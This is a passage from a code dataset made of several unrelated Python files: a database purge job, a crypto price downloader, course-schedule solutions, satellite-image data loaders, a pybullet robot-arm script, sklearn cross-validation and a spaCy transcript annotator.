args\n\n\n\ndef purgeOldMetricDataRows(thresholdDays):\n \"\"\" Purge rows from metric data table with timestamps that are older than\n the given number of days.\n\n :param int thresholdDays: Metric data rows with timestamps older than this\n number of days will be purged.\n\n :returns: number of rows that were deleted\n\n \"\"\"\n g_log.info(\"Estimating number of rows in table=%s older than numDays=%s\",\n schema.metric_data, thresholdDays)\n\n sqlEngine = htmengine.repository.engineFactory(htmengine.APP_CONFIG)\n\n selectionPredicate = (\n schema.metric_data.c.timestamp <\n sql.func.date_sub(sql.func.utc_timestamp(),\n sql.text(\"INTERVAL {:d} DAY\".format(thresholdDays)))\n )\n\n estimate = _estimateNumRowsToDelete(sqlEngine, selectionPredicate)\n\n g_log.info(\"Number of candidate old metric data rows to purge: estimate=%s\",\n estimate)\n\n if estimate == 0:\n return 0\n\n # NOTE: We'll be deleting in smaller batches to avoid \"Lock wait timeout\n # exceeded\".\n #\n # When the number of old rows is huge, if we try to delete them in a single\n # transaction, we get perpetually mired in the error \"Lock wait timeout\n # exceeded; try restarting transaction\". mysql/innodb provides the setting\n # `innodb_lock_wait_timeout` that may be overriden, but there isn't a good way\n # to estimate a value that guarantees success. Doing it in one transaction\n # also doesn't facilitate progress update, thus creating the perception that\n # the operation is \"stuck\".\n totalDeleted = 0\n\n while totalDeleted < estimate:\n # NOTE: we're dealing with a couple of issues here:\n #\n # 1. sqlalchemy core doesn't support LIMIT in delete statements, so we can't\n # use delete directly with LIMIT and ORDER BY\n # 2. MySql (5.6.21) doesn't support LIMIT & IN subqueries: \"This version of\n # MySQL doesn't yet support 'LIMIT & IN/ALL/ANY/SOME subquery\"\n #\n # So, we're going to stick with sqlalchemy, and break the operation into two\n # queries: get the candidate uid/rowid pairs, then delete matching rows\n\n limit = min(_MAX_DELETE_BATCH_SIZE, estimate - totalDeleted)\n\n uidRowidPairs = _queryCandidateRows(sqlEngine=sqlEngine,\n selectionPredicate=selectionPredicate,\n limit=limit)\n\n if uidRowidPairs:\n numDeleted = _deleteRows(sqlEngine=sqlEngine, uidRowidPairs=uidRowidPairs)\n else:\n # This could happen if something else deleted rows in our range\n break\n\n totalDeleted += numDeleted\n\n g_log.info(\"Purged %s old metric data rows [%s of %s]\", numDeleted,\n totalDeleted, estimate)\n\n\n g_log.info(\"Purged numRows=%s of estimated=%s old metric data rows from \"\n \"table=%s\", totalDeleted, estimate, schema.metric_data)\n\n return totalDeleted\n\n\n\n@sqlalchemy_utils.retryOnTransientErrors\ndef _estimateNumRowsToDelete(sqlEngine, selectionPredicate):\n \"\"\"\n :param sqlalchemy.engine.Engine sqlEngine:\n :param selectionPredicate: predicate for where clause that selects the desired\n rows for purging\n \"\"\"\n return sqlEngine.execute(\n sql.select([sql.func.count()])\n .where(selectionPredicate)).scalar()\n\n\n\n@sqlalchemy_utils.retryOnTransientErrors\ndef _queryCandidateRows(sqlEngine, selectionPredicate, limit):\n \"\"\"Query candidate uid/rowid pairss of metric data rows to delete.\n\n :param sqlalchemy.engine.Engine sqlEngine:\n :param selectionPredicate: predicate for where clause that selects the desired\n rows for purging\n :param int limit: max number of rows to delete\n\n :returns: sequence of matching uid/rowid pairs (may be empty)\n \"\"\"\n # Note: we order the result set to avoid creating holes in the data\n results = sqlEngine.execute(\n sql.select([schema.metric_data.c.uid, schema.metric_data.c.rowid])\n .where(selectionPredicate)\n .order_by(schema.metric_data.c.uid.asc(),\n schema.metric_data.c.rowid.asc())\n .limit(limit)\n ).fetchall()\n\n return tuple((str(row[0]), row[1]) for row in results)\n\n\n\n@sqlalchemy_utils.retryOnTransientErrors\ndef _deleteRows(sqlEngine, uidRowidPairs):\n \"\"\"Delete metric data rows with the given uid/rowid pairs\n\n :param sqlalchemy.engine.Engine sqlEngine:\n :param uidRowidPairs: sequence of uid/rowid pairs of metric data rows to\n delete\n\n :returns: number of rows actually deleted; this may be less than requested if\n something else deleted some of the requested rows\n \"\"\"\n return sqlEngine.execute(\n schema.metric_data.delete() # pylint: disable=E1120\n .where(\n sql.tuple_(schema.metric_data.c.uid, schema.metric_data.c.rowid).in_(\n uidRowidPairs))\n ).rowcount\n\n\n\n@logExceptions(g_log)\ndef main():\n\n try:\n try:\n args = _parseArgs(sys.argv[1:])\n except SystemExit as exc:\n if exc.code == 0:\n # Suppress exception logging when exiting due to --help\n return\n\n raise\n\n\n while True:\n purgeOldMetricDataRows(args.thresholdDays)\n\n g_log.info(\"Resuming in %s seconds...\", _PAUSE_INTERVAL_SEC)\n time.sleep(_PAUSE_INTERVAL_SEC)\n except KeyboardInterrupt:\n # Log with exception info to help debug deadlocks\n g_log.info(\"Observed KeyboardInterrupt\", exc_info=True)\n\n\n\nif __name__ == \"__main__\":\n LoggingSupport.initService()\n\n main()\n","repo_name":"bopopescu/numenta-apps-archived-htm.it-grokcli-htmitmobile","sub_path":"htmengine/htmengine/runtime/metric_garbage_collector.py","file_name":"metric_garbage_collector.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32489618735","text":"\nimport pandas as pd\nimport pandas_datareader.data as web\n\nimport requests\nimport datetime\n\n\ndef download_crypto(freq, symbols, priceNumber):\n first = True\n main_url = 'https://min-api.cryptocompare.com/data/histo{}'.format(freq)\n\n for symbol in symbols:\n print('Downloading {}'.format(symbol), end='... ')\n url = main_url + '?fsym={}'.format(symbol) + '&tsym=EUR' + '&limit={}'.format(priceNumber) + '&aggregate=1'\n response = requests.get(url)\n inter = response.json()['Data']\n inter = pd.DataFrame(inter)[['close', 'time']]\n inter.columns = [symbol, 'time']\n inter['time'] = inter['time'].map(datetime.datetime.fromtimestamp)\n\n if first:\n data = inter\n first = False\n else:\n data = pd.merge(data, inter, on='time')\n\n print('done')\n\n return data.sort_values('time', ascending=False).set_index('time')\n\n\n\ndef download_data(symbols, start, end):\n first = True\n\n for symbol in symbols:\n try:\n print('Downloading {}'.format(symbol), end='... ')\n inter = web.DataReader(symbol, 'morningstar', start, end)[['Close']]\n inter.columns = [symbol]\n inter['Date'] = inter.index.get_level_values('Date')\n inter.reset_index(drop=True, inplace=True)\n\n if first:\n price = inter.copy(True)\n del inter\n first = False\n else:\n price = pd.merge(price, inter, on='Date')\n del inter\n print('done')\n\n except:\n print(\"failed ! \")\n\n return price.sort_values('Date', ascending=False).set_index('Date')\n","repo_name":"HugoooPerrin/Cryptocurrencies","sub_path":"utils/data_collector.py","file_name":"data_collector.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39488019399","text":"from collections import defaultdict\r\ndef canFinish(numCourses: int, g):\r\n\r\n h={}\r\n def has_circle(node):\r\n if h.get(node)==-1: #mrans proccessing\r\n return True\r\n if h.get(node)==0:\r\n return False\r\n h[node]=-1\r\n for nei in g[node]:\r\n if has_circle(nei):\r\n return True\r\n h[node]=0\r\n return False\r\n\r\n for i in range(numCourses):\r\n if has_circle(i):\r\n return False\r\n return True\r\nclass Solution:\r\n def findOrder(self, numCourses, prerequisites):\r\n g=defaultdict(set)\r\n for c,p in prerequisites:\r\n g[c].add(p) \r\n if not canFinish(numCourses, g):\r\n return []\r\n ans=[]\r\n dumped=set()\r\n def dump(node):\r\n if node in dumped:\r\n return\r\n for i in g[node]:\r\n dump(i)\r\n ans.append(node)\r\n dumped.add(node)\r\n for i in range(numCourses):\r\n dump(i)\r\n return ans\r\nprint(Solution().findOrder(2, [[1,0]]))","repo_name":"yigalirani/leetcode","sub_path":"210_Course_Schedule_II.py","file_name":"210_Course_Schedule_II.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26593531301","text":"# NumPy for numerical computing\nimport numpy as np\nnp.random.seed(123)\nimport random\nrandom.seed(123)\n\n# Pandas for DataFrames\nimport pandas as pd\npd.set_option('display.max_column', 100)\n\nimport os\nimport gc\nfrom skimage import io\nfrom skimage.transform import rescale, resize, downscale_local_mean\n\nfrom tags import Tags\n\nPLANET_KAGGLE_ROOT = '/data/planet-data/'\nif not os.path.exists(PLANET_KAGGLE_ROOT):\n PLANET_KAGGLE_ROOT = '/Users/jiayou/Documents/Kaggle Data/Amazon'\n\nN_TAGS = 17\nN_TRAIN = 40479\nN_TEST_T = 40669\nN_TEST_F = 20522\nN_TEST = N_TEST_T + N_TEST_F\n\ndef load_train_image(n, tif=False, dbg=False):\n if tif:\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, 'train-tif-v2', 'train_{}.tif'.format(n)))\n else:\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, 'train-jpg', 'train_{}.jpg'.format(n)))\n if os.path.exists(path):\n img = io.imread(path)\n# if dbg:\n# plt.figure()\n# plt.imshow(img)\n return img\n # if you reach this line, you didn't find the image you're looking for\n print('Load failed: could not find image {}'.format(path))\n\ndef load_test_image(n):\n path = None\n if n < N_TEST_T:\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, 'test-jpg', 'test_{}.jpg'.format(n)))\n else:\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, 'test-jpg-additional', 'file_{}.jpg'.format(n - N_TEST_T)))\n if os.path.exists(path):\n return io.imread(path)\n # if you reach this line, you didn't find the image you're looking for\n print('Load failed: could not find image {}'.format(path))\n\n\ncalib_params = np.array(\n [[ 4953.06200497, 4238.24180873, 3039.04404623, 6387.04264221],\n [ 1692.87422811, 1528.24629706, 1576.04566834, 1804.99976545]]\n)\n\ndef preprocess_image(img):\n img = img.astype('float16')\n# img = downscale_local_mean(img, (4, 4, 1))\n\n if img.shape[2] == 3:\n # jpg\n img = 2 * (img / 255 - 0.5)\n else:\n # tif\n for i in range(4):\n img[:,:,i] = (img[:,:,i] - calib_params[0,i]) / 1500\n\n return img\n\ndef get_training_data(file_ids, tif=False, dbg=False, verbose=False):\n if verbose:\n print('Getting {} training images...'.format(len(file_ids)))\n X_train = np.zeros((len(file_ids), 256, 256, 4 if tif else 3)).astype('float16')\n for i in range(len(file_ids)):\n X_train[i,:,:,:] = preprocess_image(load_train_image(file_ids[i], tif=tif, dbg=dbg))\n if verbose and i % 100 == 0:\n print('Got {} images'.format(i+1))\n if verbose:\n print('Done')\n\n y_train = Tags().y_train(file_ids)\n if dbg:\n print(y_train)\n\n return (X_train, y_train)\n\ndef get_test_data(file_ids):\n X_train = np.array([preprocess_image(load_test_image(fname)) for fname in file_ids])\n return X_train\n\ndef augment(im, orient = None):\n shape = im.shape\n if len(shape) == 4:\n im = im.reshape((shape[1], shape[2], shape[3]))\n\n if orient is None:\n mirror = random.randint(0, 1)\n rotate = random.randint(0, 3)\n else:\n mirror = orient % 2\n rotate = int(orient / 2)\n\n im = np.rot90(im, rotate, (0, 1))\n if mirror:\n im = np.flip(im, 1)\n\n return im.reshape(shape)\n\nclass Data:\n def __init__(self, tif=False, toy=None, train=None, fold=5):\n n = N_TRAIN\n if toy is not None:\n n = toy\n self.n_train = n\n if train is None:\n train = range(fold)\n self.fold = fold\n\n self.c = 4 if tif else 3\n\n print('Loading data...')\n self.X = [0] * self.fold\n self.y = [0] * self.fold\n for i in train:\n if tif:\n self.X[i] = np.load('X.{}.npy'.format(i))\n self.y[i] = np.load('y.{}.npy'.format(i))\n else:\n self.X[i], self.y[i] = get_training_data(\n [x for x in range(n) if x % self.fold == i], tif=tif, verbose=True)\n print('Loaded fold {}.'.format(i))\n print('Loading done')\n\n # randomly generate randomly-augmented training data\n # output shape: (batch_size, 256, 256, 3)\n def gen_train(self, batch_size, val=0):\n while 1:\n f = val\n while f == val:\n f = random.randint(0, self.fold - 1)\n yield self.data_from_fold(f, batch_size)\n\n # randomly generate validation data\n # output shape: (batch_size, 256, 256, 3)\n def gen_val(self, batch_size, val=0):\n f = val\n while 1:\n ids = np.random.randint(0, len(self.y[f]), size=batch_size).tolist()\n ids.sort()\n yield (self.X[f][ids,:,:,:], self.y[f][ids,:])\n\n # generate augmented training data in order\n # output shape: (batch_size * 8, 256, 256, 3)\n def gen_train_augmented(self, batch_size):\n n = self.n_train\n start = 0\n while start < n:\n end = min(start + batch_size, n)\n\n shape = list(self.X[0].shape)\n shape[0] = 8 * (end - start)\n shape = tuple(shape)\n aug = np.zeros(shape)\n for i in range(end - start):\n cur = start + i\n f = cur % self.fold\n k = int(cur / self.fold + 1e-3)\n for orient in range(8):\n aug[8 * i + orient,:,:,:] = augment(self.X[f][k,:,:,:], orient=orient)\n yield aug\n\n start = end\n\n # generate augmented validation data in order\n # output shape: (batch_size * 8, 256, 256, 3)\n def gen_val_augmented(self, batch_size, val=0):\n f = val\n n = len(self.y[f])\n start = 0\n while start < n:\n end = min(start + batch_size, n)\n\n shape = list(self.X[f].shape)\n shape[0] = 8 * (end - start)\n shape = tuple(shape)\n aug = np.zeros(shape)\n for i in range(end - start):\n cur = start + i\n for orient in range(8):\n aug[8 * i + orient,:,:,:] = augment(self.X[f][cur,:,:,:], orient=orient)\n yield aug\n\n start = end\n\n # generate test data in order\n def gen_test(self, batch_size, n=None):\n if n is None:\n n = N_TEST\n start = 0\n while start < n:\n end = min(start + batch_size, n)\n yield get_test_data(range(start, end))\n start = end\n\n # generate augmented test data in order\n def gen_test_augmented(self, batch_size, n=None):\n if n is None:\n n = N_TEST\n start = 0\n while start < n:\n end = min(start + batch_size, n)\n\n original = get_test_data(range(start, end))\n shape = list(original.shape)\n shape[0] *= 8\n shape = tuple(shape)\n aug = np.zeros(shape)\n for i in range(end - start):\n for orient in range(8):\n aug[8 * i + orient,:,:,:] = augment(original[i,:,:,:], orient=orient)\n yield aug\n\n start = end\n\n # return $batch_size randomly-augmented images from a fold\n def data_from_fold(self, f, batch_size):\n ids = np.random.randint(0, len(self.y[f]), size=batch_size).tolist()\n ids.sort()\n X = np.zeros((len(ids), 256, 256, self.c))\n for i in range(len(ids)):\n X[i,:,:,:] = augment(self.X[f][ids[i],:,:,:])\n return (X, self.y[f][ids,:])\n\n def get_fold(self, f=0):\n return (self.X[f], self.y[f])\n\n def consolidate(self, pred):\n return pred.mean(axis=0)\n\n def gen_mask(self, g, select):\n for x, y in g:\n for i in range(N_TAGS):\n if not i in select:\n y[:,i] = 0\n yield (x, y)\n\n\n\n\ndef get_training_file_ids(draw_size):\n file_ids = np.random.randint(0, N_TRAIN, size=draw_size).tolist()\n for i in range(len(file_ids)):\n if file_ids[i] % 5 == 0:\n file_ids[i] = (file_ids[i] + 1) % N_TRAIN\n return file_ids\n\ndef get_calib_params():\n draw_size = 1000\n file_ids = get_training_file_ids(draw_size)\n ref_color = [[], [], [], []]\n\n for i in range(draw_size):\n current_im = io.imread(os.path.join(PLANET_KAGGLE_ROOT, 'train-tif-v2', 'train_{}.tif'.format(file_ids[i])))\n flatten_im = current_im.reshape((-1, 4))\n for j in range(4):\n ref_color[j] += flatten_im[:, j].tolist()\n\n ref_color = np.array(ref_color)\n ref_param = np.zeros((2, 4))\n ref_param[0,:] = ref_color.mean(axis = 1)\n ref_param[1,:] = ref_color.std(axis = 1)\n return ref_param","repo_name":"kylinorange/kaggle-planet","sub_path":"notebooks/utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43680475947","text":"'''\nCreated on Jun 25, 2021\n\n@author: jiadongc\n'''\nimport imageio\nwriter = []\nfilenames = []\nfor i in range(0,8):\n filenames.append(str(i))\nprint(filenames)\nfor filename in filenames:\n image = imageio.imread(\"C://Users//jiadongc//classes//myResearch//prelim//gif_figs2//\"+filename+\".png\")\n writer.append(image)\nexportname = \"output11.gif\"\nkargs = { 'duration': 0.8 }\nimageio.mimsave(exportname, writer, 'GIF', **kargs)","repo_name":"dd-debug/examples_chemical_potential_diagrams","sub_path":"save_gifs.py","file_name":"save_gifs.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4814409157","text":"import pybullet as p\nimport time\nimport pybullet_data\nimport os, inspect\nimport numpy as np\nimport copy\nimport math\nimport random\n\nclass tm700:\n\n def __init__(self, urdfRootPath=pybullet_data.getDataPath(), timeStep=0.01):\n self.urdfRootPath = urdfRootPath\n self.timeStep = timeStep\n self.maxVelocity = .35\n self.maxForce = 200.\n self.fingerAForce = 2\n self.fingerBForce = 2.5\n self.fingerTipForce = 2\n self.useInverseKinematics = 1\n self.useSimulation = True\n self.useNullSpace = 21\n self.useOrientation = 0\n self.tmEndEffectorIndex = 5\n self.tmGripperIndex = 7\n # lower limits for null space\n # self.ll = [-.967, -2, -2.96, 0.19, -2.96, -2.09, -3.05]\n self.ll = [-10, -10, -10, -10, -10, -10, -10]\n\n # upper limits for null space\n self.ul = [.967, 2, 2.96, 2.29, 2.96, 2.09, 3.05]\n self.ul = [10, 10, 10, 10, 10, 10, 10]\n # joint ranges for null space\n # self.jr = [5.8, 4, 5.8, 4, 5.8, 4, 6]\n self.jr = [10, 10, 10, 10, 10, 10, 10]\n # restposes for null space\n self.rp = [0, 0, 0, 0.5 * math.pi, 0, -math.pi * 0.5 * 0.66, 0]\n # joint damping coefficents\n self.jd = [\n 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001,\n 0.00001, 0.00001, 0.00001, 0.00001\n ]\n self.reset()\n\n def reset(self):\n\n robot = p.loadURDF(\"../Gazebo_arm/urdf/tm700_robot_clean.urdf\")\n self.tm700Uid = robot\n p.resetBasePositionAndOrientation(self.tm700Uid, [0.0, 0.0, 0.0], # position of robot, GREEN IS Y AXIS\n [0.000000, 0.000000, 1.000000, 0.000000]) # direction of robot\n self.jointPositions = [\n 0.0, 0.0, -0, -0, -0.5, -1, -1.57, 0,\n #0.09196934635505513, -1.2212455855949105, -0.5971444720831858, -0.6572313840869254, -1.4991674243259474, 0.0,\n 0.0, 0.0, -0, -0, -0, -0, -0, -0.0, -0.0, -0.0]\n\n self.numJoints = p.getNumJoints(self.tm700Uid)\n for jointIndex in range(1,self.numJoints):\n p.resetJointState(self.tm700Uid, jointIndex, self.jointPositions[jointIndex])\n p.setJointMotorControl2(self.tm700Uid,\n jointIndex,\n p.POSITION_CONTROL,\n targetPosition=self.jointPositions[jointIndex],\n force=self.maxForce)\n\n # print('Link:', p.getLinkState(self.tm700Uid, jointIndex))\n\n # print(p.getJointInfo(robot, jointIndex))\n\n\n #\n # self.trayUid = p.loadURDF(os.path.join(self.urdfRootPath, \"tray/tray.urdf\"), 0.6400, #first 3: position, last 4: quaternions\n # 0.0000, 0.001, 0.000000, 0.000000, 1.000000, 0.000000)\n self.endEffectorPos = [0.0, 0.0, 0.0]\n self.endEffectorAngle = 0\n\n\n# BLOCK\n xpos = 0.55 # * random.random()\n ypos = 0.2 # * random.random()\n ang = 3.14 #* random.random()\n orn = p.getQuaternionFromEuler([0, 0, ang])\n self.blockUid = p.loadURDF(os.path.join(self.urdfRootPath, \"block.urdf\"), xpos, ypos, 0.05,\n orn[0], orn[1], orn[2], orn[3])\n blockPos, blockOrn = p.getBasePositionAndOrientation(self.blockUid)\n print('BLOCK INFO:', blockPos, blockOrn)\n print('block:', self.blockUid)\n\n self.motorNames = []\n self.motorIndices = []\n\n for i in range(self.numJoints):\n jointInfo = p.getJointInfo(self.tm700Uid, i)\n qIndex = jointInfo[3]\n if qIndex > -1:\n #print(\"motorname\")\n #print(jointInfo[1])\n self.motorNames.append(str(jointInfo[1]))\n self.motorIndices.append(i)\n # print('motorindeces', self.motorIndices)\n\n def getActionDimension(self):\n if (self.useInverseKinematics):\n return len(self.motorIndices)\n return 6 #position x,y,z and roll/pitch/yaw euler angles of end effector\n\n def getObservationDimension(self):\n return len(self.getObservation())\n\n jointInfo = p.getJointInfo(self.tm700Uid, i)\n qIndex = jointInfo[3]\n\n def getObservation(self):\n observation = []\n state = p.getLinkState(self.tm700Uid, self.tmGripperIndex)\n pos = state[0]\n orn = state[1] #Cartesian orientation of center of mass, in quaternion [x,y,z,w]\n\n euler = p.getEulerFromQuaternion(orn)\n\n observation.extend(list(pos))\n observation.extend(list(euler))\n\n return observation\n\n def applyAction(self, motorCommands):\n\n #print (\"self.numJoints\")\n #print (self.numJoints)\n if (self.useInverseKinematics):\n\n dx = motorCommands[0]\n dy = motorCommands[1]\n dz = motorCommands[2]\n da = motorCommands[3]\n fingerAngle = motorCommands[4]\n state = p.getLinkState(self.tm700Uid, self.tmEndEffectorIndex) # returns 1. center of mass cartesian coordinates, 2. rotation around center of mass in quaternion\n actualEndEffectorPos = state[0]\n #print(\"pos[2] (getLinkState(tmEndEffectorIndex)\")\n #print(actualEndEffectorPos[2])\n\n self.endEffectorPos[0] = dx\n self.endEffectorPos[1] = dy\n self.endEffectorPos[2] = dz\n #\n self.endEffectorAngle = self.endEffectorAngle + da\n pos = [dx, dy, dz]\n orn = p.getQuaternionFromEuler([0, -math.pi, 0]) # -math.pi,yaw])\n\n if (self.useOrientation == 1): # FALSE\n jointPoses = p.calculateInverseKinematics(self.tm700Uid,\n self.tmEndEffectorIndex,\n pos,\n orn,\n jointDamping=self.jd)\n else:\n jointPoses = p.calculateInverseKinematics(self.tm700Uid, self.tmEndEffectorIndex, pos,residualThreshold= 0.01)\n print('POSES OF JOINTS', jointPoses)\n\n if (self.useSimulation):\n for i in range(self.tmEndEffectorIndex+1):\n\n p.setJointMotorControl2(bodyUniqueId=self.tm700Uid,\n jointIndex=i,\n controlMode=p.POSITION_CONTROL,\n targetPosition=jointPoses[i],\n targetVelocity=0,\n force=self.maxForce,\n maxVelocity=self.maxVelocity,\n positionGain=0.3,\n velocityGain=1)\n\n def print_joint_state(self):\n print(p.getLinkState(self.tm700Uid, self.tmEndEffectorIndex))\n # print(p.getJointInfo(self.tm700Uid, 7))\n\nif __name__ == '__main__':\n\n\n physicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n\n tm700test = tm700()\n tm700test.reset\n p.setGravity(0,0,0)\n #tm700test.applyAction([0.67, 0.2, 0.05,0,0])\n tm700test.applyAction([0.55, 0.2, 0.05,0,0])\n for i in range (10000):\n p.stepSimulation()\n tm700test.print_joint_state()\n time.sleep(1./240.0)\n p.disconnect()\n","repo_name":"Tung-I/RoboticGrasper","sub_path":"unused_code/tm700_noinverse.py","file_name":"tm700_noinverse.py","file_ext":"py","file_size_in_byte":6853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13279774421","text":"from sklearn.model_selection import cross_val_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import svm\nfrom sklearn.metrics.pairwise import chi2_kernel\n\ndef crossLinear(dataset):\n X = dataset[0] # vecteur d'image\n y = dataset[1] # vecteur de classes\n \n clf = svm.SVC(kernel='linear', C=1)\n scores = cross_val_score(clf, X, y, cv=5)\n print(\"Linear : Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n return scores \n\n\ndef crossChi2(dataset):\n X = dataset[0] # vecteur d'image\n y = dataset[1] # vecteur de classes\n\n clf = svm.SVC(kernel=chi2_kernel).fit(dataset[0],dataset[1])\n scores = cross_val_score(clf, X, y, cv=5)\n print(\"Chi2 : Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n return scores\n\n\ndef crossNW(dataset): \n X = dataset[0]\n y = dataset[1]\n\n mlp = MLPClassifier(hidden_layer_sizes=(25), max_iter=15000)\n\n scalar = StandardScaler()\n X = scalar.fit_transform(X)\n\n scores = cross_val_score(mlp, X, y, cv=5)\n \n print(\"NeuralNetwork : Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n return scores\n\ndef crossNB(dataset):\n X = dataset[0]\n y = dataset[1]\n\n clf = GaussianNB()\n\n scores = cross_val_score(clf, X, y , cv=5)\n\n print(\"Naive Bayse : Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n return scores\n \n\n","repo_name":"Roger-ELIAS/Apprentissage-Automatique","sub_path":"crossValidate.py","file_name":"crossValidate.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74901961973","text":"\nimport re\nfrom datetime import datetime\nimport spacy\nimport csv\nimport pandas\nfrom pandas import DataFrame\n\ndef parse_ner(text):\n nlp = spacy.load(\"de_core_news_sm\")\n doc = nlp(text)\n\n # more info can be extracted such as: e.start_char, e.end_char\n ents = [(e.text, e.label_) for e in doc.ents] # returns a list of tuples [(Zurich, LOC), (Ursula, PER) ...]\n return ents\n\ndef get_sec(time_str):\n time_str = time_str.replace(\"(\",\" \").replace(\")\",\" \").strip()\n if len(time_str.split(':')) == 2:\n m, s = time_str.split(':')\n return int(m) * 60 + int(s)\n else:\n h, m, s = time_str.split(':')\n return int(h)*3600 + int(m) * 60 + int(s)\n\ndef extract_unique_entities(text_split_on_timestamp, print=False):\n all_entities = dict()\n for count, paragraph in enumerate(text_split_on_timestamp):\n if count % 10 == 0:\n print(count)\n entities_found = parse_ner(paragraph)\n for ent in entities_found:\n all_entities[ent] = all_entities.get(ent, 0) + 1\n\n if print:\n with open('all_named_entities.csv', 'w') as f:\n for key in all_entities.keys():\n f.write(\"%s,%s,%s\\n\" % (key[0], key[1], all_entities[key]))\n\ndef extract_entities_per_paragraph(text_split_on_timestamp):\n\n entities_list_all_paragraphs = []\n for count, paragraph in enumerate(text_split_on_timestamp):\n if count % 10 == 0:\n print(count)\n entities_found = parse_ner(paragraph)\n entities_processed = []\n for entity in entities_found:\n name = entity[0]\n entities_processed.append(name)\n entities_names_concat = ';'.join(entities_processed)\n entities_list_all_paragraphs.append(entities_names_concat)\n\n return entities_list_all_paragraphs\n\ndef preprocess_text(paragraph):\n paragraph = paragraph.replace(\"[Anm. Transkription:\", \"(\").replace(\"]\",\")\").replace(\"(unv.)\", \"(?)\")\n return paragraph\n\ndef prepare_and_annotate_paragraphs(text_split_on_timestamp, res_timestamps):\n res_timestamps.insert(0, \"(00:00)\")\n print(len(text_split_on_timestamp), len(res_timestamps))\n preprocessed_paragraphs = []\n for paragraph in text_split_on_timestamp:\n preprocessed_paragraphs.append(preprocess_text(paragraph))\n entities_list_all_paragraphs = extract_entities_per_paragraph(text_split_on_timestamp)\n\n df = DataFrame({'Start': res_timestamps, 'Content': preprocessed_paragraphs, 'Entities': entities_list_all_paragraphs})\n df.to_excel(\"time_segmented_content_entities.xlsx\", sheet_name='sheet1', index=False)\n\ndef get_timestamps_statistics(res_timestamps):\n paragraph_lengths = []\n i, j = 0,1\n while j < len(res_timestamps):\n tdelta = get_sec(res_timestamps[j]) - get_sec(res_timestamps[i])\n paragraph_lengths.append(tdelta)\n j+=1\n i+=1\n print('\\n Timestamps statistics:')\n print(\"AVG diff length (s):\", sum(paragraph_lengths)/len(paragraph_lengths), paragraph_lengths)\n\ndef read_file(filename):\n with open(filename, 'r', encoding = 'utf-16') as file:\n text = file.read()\n\n # Remove all intermediate timestamps (usually appear together with a comment in the middle of a sentence/paragraph)\n text = re.sub(\"\\(unv., .{2}:.{2}\\)\", \"(?)\", text)\n text = re.sub(\", .{2}:.{2}]\", \"]\", text)\n\n text_split_on_timestamp = re.compile(r'\\(.{2}:.{2}\\)|\\(.{1}:.{2}:.{2}\\)').split(text)\n print(\"Nr paragraphs: \",len(text_split_on_timestamp))\n #extract_unique_entities(text_split_on_timestamp, print=True)\n\n res_timestamps = re.findall(r'\\(.{2}:.{2}\\)|\\(.{1}:.{2}:.{2}\\)', text)\n print(\"Nr timestamps: \", len(res_timestamps), res_timestamps)\n\n prepare_and_annotate_paragraphs(text_split_on_timestamp, res_timestamps)\n\n\nif __name__ == '__main__':\n filename = \"20192705_Pellaton_Ausdruckstanz_unkorrigiert.txt\"\n read_file(filename)\n","repo_name":"JelkeJL/Pellaton","sub_path":"data preparation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20866069377","text":"#!/usr/bin/env python3\n\nclass Solution(object):\n def hasLoop(self, course, course_to_prereq):\n \"\"\"\n Followers:\n Awndre\n cptwalrus\n alvin5How\n TheldOfAlan\n SimoncitoOwU\n andre_santoz\n \"\"\"\n to_visit = [course]\n seen = set()\n\n while to_visit:\n print(seen)\n # Get the course to visit\n current = to_visit.pop()\n\n if current in seen:\n print(\"Encountered a seen node\" + str(current))\n return True\n else:\n seen.add(current)\n\n # Queue up the dependencies\n for dep in course_to_prereq[current]:\n if dep not in to_visit:\n to_visit.append(dep)\n\n return False\n\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n Followers\n nillhiam\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n course_to_prereq = {}\n\n for course in range(numCourses):\n course_to_prereq[course] = []\n\n for pair in prerequisites:\n course_to_prereq[pair[0]].append(pair[1])\n\n # Walk the depcourseendency path\n for course in course_to_prereq:\n loop = self.hasLoop(course, course_to_prereq)\n\n if loop:\n return False\n\n return True\n","repo_name":"code-in-public/leetcode","sub_path":"course-schedule/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"264360236","text":"import os\nimport subprocess\nimport psutil\nimport random\nfrom typing import List # noqa: F401\n\nfrom libqtile import bar, layout, 